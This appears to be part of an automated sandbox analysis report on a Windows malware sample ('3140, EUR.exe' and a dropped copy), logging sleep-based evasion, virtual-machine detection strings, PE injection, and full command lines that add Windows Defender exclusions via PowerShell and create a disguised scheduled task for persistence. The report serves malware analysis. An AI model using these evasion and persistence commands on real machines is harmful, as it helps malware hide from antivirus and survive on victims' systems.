Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7740	Thread sleep count: 2161 > 30
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -599828s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -599560s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7740	Thread sleep count: 7694 > 30
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -599432s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -599174s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -599047s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -598937s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -598828s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -598718s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -598609s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -598500s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -598387s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -598266s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -598156s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -598047s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -597937s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -597828s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -597719s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -597594s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -597484s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -597375s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -597265s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -597156s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -597047s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -596937s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -596828s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -596719s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -596609s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -596500s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -596390s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -596281s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -596172s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -596062s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -595953s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -595844s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -595734s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -595625s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -595515s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -595406s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -595294s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -595174s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -595058s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -594937s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -594828s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -594719s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -594609s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -594500s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -594391s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -594281s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -594172s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -594062s >= -30000s

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 598007	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 597786	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 597560	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 597334	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 597212	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 597045	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 596717	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 596391	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 596266	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 595594	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 595375	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 595266	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 595141	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 594865	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 594484	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 594180	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 594061	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 593953	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 593844	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 593734	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 593625	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 593502	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 599828
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 599560
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 599432
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 599174
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 599047
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 598937
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 598828
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 598718
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 598609
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 598500
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 598387
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 598266
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 598156
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 598047
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 597937
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 597828
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 597719
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 597594
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 597484
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 597375
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 597265
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 597156
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 597047
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 596937
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 596828
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 596719
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 596609
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 596500
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 596390
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 596281
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 596172
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 596062
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 595953
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 595844
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 595734
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 595625
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 595515
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 595406
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 595294
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 595174
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 595058
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 594937
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 594828
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 594719
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 594609
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 594500
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 594391
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 594281
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 594172
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 594062

Source: lkuPOyvaWlIu.exe, 00000009.00000002.1801962892.0000000000CFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 3140, EUR.exe, 00000008.00000002.4120490815.00000000013A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllubli
Source: lkuPOyvaWlIu.exe, 00000009.00000002.1801962892.0000000000D50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}!
Source: lkuPOyvaWlIu.exe, 0000000F.00000002.4120391587.0000000001496000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe

Code function: 15_2_06F29548 LdrInitializeThunk,

15_2_06F29548

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\3140, EUR.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\3140, EUR.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe"
Source: C:\Users\user\Desktop\3140, EUR.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Source: C:\Users\user\Desktop\3140, EUR.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe"	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\3140, EUR.exe	Memory written: C:\Users\user\Desktop\3140, EUR.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Memory written: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\Desktop\3140, EUR.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe"	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmpE737.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process created: C:\Users\user\Desktop\3140, EUR.exe "C:\Users\user\Desktop\3140, EUR.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmp4A2.tmp"
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"

Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Users\user\Desktop\3140, EUR.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
